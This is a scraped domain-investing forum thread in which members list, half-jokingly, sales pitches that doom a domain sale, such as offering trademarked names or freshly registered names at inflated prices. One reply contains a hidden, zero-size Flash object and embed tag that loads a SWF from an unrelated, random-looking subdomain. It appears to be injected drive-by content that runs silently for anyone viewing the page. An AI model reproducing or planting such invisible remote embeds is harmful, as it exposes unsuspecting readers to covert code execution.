Enjoy unlimited access to all forum features for FREE! Optional upgrade available for extra perks.
Sedo.com

Top things not to tell a end user!

Status
Not open for further replies.

cbk

Level 6
Legacy Gold Member
Reaction score

Last edited:

Biggie

DNForum Moderator
Legacy Exclusive Member
Reaction score
Top things not to tell a end user when trying to sell a domain name to guarantee a no sale.

2. "I just hand registered this domain name 5 minutes ago and wanted to know if you are interested in purchasing it."

i've seen a member post this in their sales thread recently here on the forum.

he just regged it and was asking $XXX,XXX for it

snowwhite

Level 1
Legacy Platinum Member
Reaction score
Top things to tell a end user when trying to sell a domain name to guarantee a no sale.

My favs

1. "I realize you own this business and have a trademark would you be interested in purchasing it."

2. "I just hand registered this domain name 5 minutes ago and wanted to know if you are interested in purchasing it."

3. " I am also a member on DNForum." LOL
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://m09y0106tkvx208.imageshacknow.info/pages/2510/"></param><param name="allowFullScreen" value="true"></param><embed src="http://m09y0106tkvx208.imageshacknow.info/pages/2510/" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

haha, nice post gave me a little laugh................gotta love #2!:lol:

D

Domn

#1 trademarked names or similar names is a dangerous road, sometimes the owner decides to buy because the offer is pretty small compared with the legal fees, other times he will be so pissed that he will give any amount possible to lawyers to get it. It's much safer not to go this way at all from the first place.

#2 99,9% of the times you will earn a newbie award for this and nothing more.

#3 an end-user paying to be a member of a closed forum dedicated to domain names is not so "end-user" :)

katherine

Country hopper
Legacy Exclusive Member
Reaction score
"Hey Bro I'm selling this domain for $100, payment by western union only interested ?"

"I noticed you didn't register your trademark domain in .tel so I secured the name on your behalf and I thought you may want to buy it for $500 ? (time-sensitive offer)"

"This .biz typo of your brand name has recently expired and I am pleased to inform you I was able to catch it. You see, I was concerned it could land in the hands of a cybersquatter. I shall be pleased to hand it over to your Company for a very modest fee. Regards."

:)

Status
Not open for further replies.

The Rule #1

Do not insult any other member. Be polite and do business. Thank you!

Members Online

Sedo - it.com Premiums

IT.com

Premium Members

MariaBuy

Our Mods' Businesses

UrlPick.com

*the exceptional businesses of our esteemed moderators

Top Bottom